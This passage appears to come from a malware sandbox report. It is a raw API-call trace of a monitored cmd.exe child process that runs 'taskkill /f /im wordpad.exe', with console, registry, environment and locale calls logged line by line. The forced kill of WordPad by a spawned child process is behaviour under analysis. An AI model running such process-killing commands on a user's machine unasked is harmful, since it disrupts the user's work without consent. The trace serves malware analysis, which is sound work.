(hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.004] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0071.004] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.004] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0071.004] SetConsoleInputExeNameW () returned 0x1 [0071.004] GetConsoleOutputCP () returned 0x1b5 [0071.004] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0071.004] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.004] exit (_Code=128) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1cd37000" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im wordpad.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0xb50 [0060.265] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x38f7d4 | out: lpSystemTimeAsFileTime=0x38f7d4*(dwLowDateTime=0x93dccb90, dwHighDateTime=0x1d57b18)) [0060.265] GetCurrentProcessId () returned 0xb4c [0060.265] GetCurrentThreadId () returned 0xb50 [0060.265] GetTickCount () returned 0x1149888 [0060.265] QueryPerformanceCounter (in: lpPerformanceCount=0x38f7cc | out: lpPerformanceCount=0x38f7cc*=18048629001) returned 1 [0060.266] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0060.266] __set_app_type (_Type=0x1) [0060.266] __p__fmode () returned 0x74eb31f4 [0060.654] __p__commode () returned 0x74eb31fc [0060.654] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0060.654] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0060.655] GetCurrentThreadId () returned 0xb50 [0060.655] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb50) returned 0x60 [0060.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.655] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0060.655] SetThreadUILanguage (LangId=0x0) returned 0x409 [0060.655] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.655] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f764 | out: phkResult=0x38f764*=0x0) returned 0x2 [0060.655] VirtualQuery (in: lpAddress=0x38f79b, lpBuffer=0x38f734, dwLength=0x1c | out: lpBuffer=0x38f734*(BaseAddress=0x38f000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.655] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x38f734, dwLength=0x1c | out: lpBuffer=0x38f734*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0060.655] VirtualQuery (in: lpAddress=0x291000, lpBuffer=0x38f734, dwLength=0x1c | out: lpBuffer=0x38f734*(BaseAddress=0x291000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0060.655] VirtualQuery (in: lpAddress=0x293000, lpBuffer=0x38f734, dwLength=0x1c | out: lpBuffer=0x38f734*(BaseAddress=0x293000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.655] VirtualQuery (in: lpAddress=0x390000, lpBuffer=0x38f734, dwLength=0x1c | out: lpBuffer=0x38f734*(BaseAddress=0x390000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0060.655] GetConsoleOutputCP () returned 0x1b5 [0060.656] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.656] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0060.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.656] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0060.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0060.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.656] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0060.656] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.656] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0060.657] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.657] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0060.657] GetEnvironmentStringsW () returned 0x402040* [0060.657] GetProcessHeap () returned 0x3f0000 [0060.657] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xaca) returned 0x402b18 [0060.657] FreeEnvironmentStringsW (penv=0x402040) returned 1 [0060.657] GetProcessHeap () returned 0x3f0000 [0060.657] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4) returned 0x400c78 [0060.657] GetEnvironmentStringsW () returned 0x402040* [0060.657] GetProcessHeap () returned 0x3f0000 [0060.657] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xaca) returned 0x4035f0 [0060.657] FreeEnvironmentStringsW (penv=0x402040) returned 1 [0060.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38e6d4 | out: phkResult=0x38e6d4*=0x68) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x0, lpData=0x38e6e0*=0x0, lpcbData=0x38e6d8*=0x1000) returned 0x2 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x4, lpData=0x38e6e0*=0x1, lpcbData=0x38e6d8*=0x4) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x0, lpData=0x38e6e0*=0x1, lpcbData=0x38e6d8*=0x1000) returned 0x2 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x4, lpData=0x38e6e0*=0x0, lpcbData=0x38e6d8*=0x4) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x4, lpData=0x38e6e0*=0x40, lpcbData=0x38e6d8*=0x4) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x4, lpData=0x38e6e0*=0x40, lpcbData=0x38e6d8*=0x4) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x0, lpData=0x38e6e0*=0x40, lpcbData=0x38e6d8*=0x1000) returned 0x2 [0060.658] RegCloseKey (hKey=0x68) returned 0x0 [0060.658] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38e6d4 | out: phkResult=0x38e6d4*=0x68) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x0, lpData=0x38e6e0*=0x40, lpcbData=0x38e6d8*=0x1000) returned 0x2 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x4, lpData=0x38e6e0*=0x1, lpcbData=0x38e6d8*=0x4) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x0, lpData=0x38e6e0*=0x1, lpcbData=0x38e6d8*=0x1000) returned 0x2 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x4, lpData=0x38e6e0*=0x0, lpcbData=0x38e6d8*=0x4) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x4, lpData=0x38e6e0*=0x9, lpcbData=0x38e6d8*=0x4) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x4, lpData=0x38e6e0*=0x9, lpcbData=0x38e6d8*=0x4) returned 0x0 [0060.658] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38e6dc, lpData=0x38e6e0, lpcbData=0x38e6d8*=0x1000 | out: lpType=0x38e6dc*=0x0, lpData=0x38e6e0*=0x9, lpcbData=0x38e6d8*=0x1000) returned 0x2 [0060.659] RegCloseKey (hKey=0x68) returned 0x0 [0060.659] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebad [0060.659] srand (_Seed=0x5d97ebad) [0060.659] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im wordpad.exe" [0060.659] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im wordpad.exe" [0060.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.659] GetProcessHeap () returned 0x3f0000 [0060.659] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x210) returned 0x402040 [0060.659] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x402048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0060.659] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.659] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.659] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.659] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.659] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.659] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.659] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.659] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.659] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.659] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.659] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.660] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.660] GetProcessHeap () returned 0x3f0000 [0060.660] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x402b18 | out: hHeap=0x3f0000) returned 1 [0060.660] GetEnvironmentStringsW () returned 0x402258* [0060.660] GetProcessHeap () returned 0x3f0000 [0060.660] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xae2) returned 0x404bb8 [0060.660] FreeEnvironmentStringsW (penv=0x402258) returned 1 [0060.660] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0060.660] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.660] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.660] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.660] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.660] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.660] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.660] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.660] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.660] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.660] GetProcessHeap () returned 0x3f0000 [0060.660] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x54) returned 0x4056a8 [0060.660] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x38f4a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.660] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x38f4a0, lpFilePart=0x38f49c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x38f49c*="Desktop") returned 0x25 [0060.660] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.660] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x38f21c | out: lpFindFileData=0x38f21c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x401ec0 [0060.661] FindClose (in: hFindFile=0x401ec0 | out: hFindFile=0x401ec0) returned 1 [0060.661] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x38f21c | out: lpFindFileData=0x38f21c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x401ec0 [0060.661] FindClose (in: hFindFile=0x401ec0 | out: hFindFile=0x401ec0) returned 1 [0060.661] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0060.661] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x38f21c | out: lpFindFileData=0x38f21c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x401ec0 [0060.661] FindClose (in: hFindFile=0x401ec0 | out: hFindFile=0x401ec0) returned 1 [0060.661] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.661] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0060.661] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0060.661] GetProcessHeap () returned 0x3f0000 [0060.661] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404bb8 | out: hHeap=0x3f0000) returned 1 [0060.661] GetEnvironmentStringsW () returned 0x4040c8* [0060.661] GetProcessHeap () returned 0x3f0000 [0060.661] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb36) returned 0x405f08 [0060.661] FreeEnvironmentStringsW (penv=0x4040c8) returned 1 [0060.661] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.661] GetProcessHeap () returned 0x3f0000 [0060.661] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4056a8 | out: hHeap=0x3f0000) returned 1 [0060.662] GetProcessHeap () returned 0x3f0000 [0060.662] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400e) returned 0x406a48 [0060.662] GetProcessHeap () returned 0x3f0000 [0060.662] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x44) returned 0x401ec0 [0060.662] GetProcessHeap () returned 0x3f0000 [0060.662] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x406a48 | out: hHeap=0x3f0000) returned 1 [0060.662] GetConsoleOutputCP () returned 0x1b5 [0060.662] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.662] GetUserDefaultLCID () returned 0x409 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x38f5e0, cchData=128 | out: lpLCData="0") returned 2 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x38f5e0, cchData=128 | out: lpLCData="0") returned 2 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x38f5e0, cchData=128 | out: lpLCData="1") returned 2 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0060.663] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0060.664] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0060.665] GetProcessHeap () returned 0x3f0000 [0060.665] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20c) returned 0x402dd0 [0060.665] GetConsoleTitleW (in: lpConsoleTitle=0x402dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.665] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.665] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0060.665] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0060.665] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0060.665] GetProcessHeap () returned 0x3f0000 [0060.665] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x406a48 [0060.665] GetProcessHeap () returned 0x3f0000 [0060.665] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x406a48 | out: hHeap=0x3f0000) returned 1 [0060.666] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0060.666] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0060.666] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0060.666] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0060.666] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0060.666] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0060.666] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0060.666] GetProcessHeap () returned 0x3f0000 [0060.666] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x402fe8 [0060.666] GetProcessHeap () returned 0x3f0000 [0060.666] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1a) returned 0x405748 [0060.667] GetProcessHeap () returned 0x3f0000 [0060.667] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x30) returned 0x403048 [0060.667] GetConsoleTitleW (in: lpConsoleTitle=0x38f2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.668] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.668] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.668] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.668] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.668] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.668] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.668] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.668] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.668] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.668] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.668] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.668] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.668] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.668] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.668] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.668] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.668] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.668] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.668] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.668] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.668] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.668] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.668] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.668] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.668] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.668] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.669] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.669] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.669] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.669] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.669] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.669] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.669] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.669] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.669] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.669] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.669] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.669] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.669] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.669] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.669] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.669] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.669] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.669] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.669] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.669] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.669] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.669] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.669] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.669] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.669] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.669] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.669] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.669] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.669] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.669] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.669] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.669] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.669] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.669] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.669] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.669] _wcsicmp 